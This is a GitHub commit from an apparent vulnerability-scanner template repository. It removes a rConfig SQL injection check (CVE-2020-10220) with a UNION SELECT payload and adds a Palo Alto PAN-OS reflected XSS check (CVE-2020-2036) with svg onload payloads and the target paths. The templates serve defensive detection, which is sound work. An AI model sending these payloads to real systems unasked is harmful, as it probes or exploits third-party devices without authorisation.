Create CVE-2020-2036.yaml

patch-1
SaN ThosH 2021-02-15 01:30:21 +05:30 committed by GitHub
parent 41c6dfea0c
commit 6c23c6a4f7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 22 additions and 20 deletions

View File

@ -1,20 +0,0 @@
id: CVE-2020-10220
info:
name: rConfig SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220
tags: SQLI
requests:
- method: GET
path:
- "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)%20limit%200,1),NULL--"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body

View File

@ -0,0 +1,22 @@
id: CVE-2020-2036
info:
name: Palo Alto Networks Reflected Cross Site Scripting
author: madrobot
severity: medium
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2036
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
tags: XSS
requests:
- method: GET
path:
- "{{BaseURL}}/unauth/php/change_password.php/"><svg/onload=alert(1)>"
- "{{BaseURL}}/php/change_password.php/"><svg/onload=alert(1)>"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1)>"
part: body